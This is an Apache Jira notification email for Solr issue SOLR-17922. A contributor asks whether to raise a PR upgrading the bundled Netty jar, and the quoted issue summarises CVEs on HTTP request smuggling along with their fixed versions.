[jira] [Comment Edited] (SOLR-17922) Upgrade netty jar to fix CVE-2025-58057 , CVE-2025-58056 , CVE-2025-24970

Thu, 21 May 2026 14:06:09 -0700 


    [ 
https://issues.apache.org/jira/browse/SOLR-17922?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18082696#comment-18082696
 ] 

Jalaz Kumar edited comment on SOLR-17922 at 5/21/26 9:05 PM:
-------------------------------------------------------------

[~dsmiley] Is this a valid issue? i can raise PR if this is required to be 
closed or do we rely upon solrbot to close this?

 

saw some previous PR: [https://github.com/apache/solr/pull/2702] that was 
raised by solrbot ~2 years back, thus curious.


was (Author: JIRAUSER311120):
[~dsmiley] Is this a valid issue? i can raise PR if this is required to be done 
or do we rely upon solrbot to close this?

 

saw some previous PR: https://github.com/apache/solr/pull/2702 that was raised 
by solrbot ~2 years back, thus curious.

> Upgrade netty jar to fix CVE-2025-58057 , CVE-2025-58056 , CVE-2025-24970
> -------------------------------------------------------------------------
>
>                 Key: SOLR-17922
>                 URL: https://issues.apache.org/jira/browse/SOLR-17922
>             Project: Solr
>          Issue Type: Improvement
>    Affects Versions: 9.8.1, 9.9.0
>            Reporter: Dhoka Pramod
>            Priority: Major
>
> CVE ID: CVE-2025-58057 , CVE-2025-58056 , CVE-2025-24970
> Affected solr Version: 9.8.x , 9.9.0
> Vulnerable Dependency: Netty 4.1.114
> Impact: Netty is an asynchronous event-driven network application framework 
> for development of maintainable high performance protocol servers and 
> clients. In versions 4.1.124.Final, and 4.2.0.Alpha3 through 4.2.4.Final, 
> Netty incorrectly accepts standalone newline characters (LF) as a chunk-size 
> line terminator, regardless of a preceding carriage return (CR), instead of 
> requiring CRLF per HTTP/1.1 standards. When combined with reverse proxies 
> that parse LF differently (treating it as part of the chunk extension), 
> attackers can craft requests that the proxy sees as one request but Netty 
> processes as two, enabling request smuggling attacks. 
> Fix : This is fixed in versions 4.1.125.Final and 4.2.5.Final.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to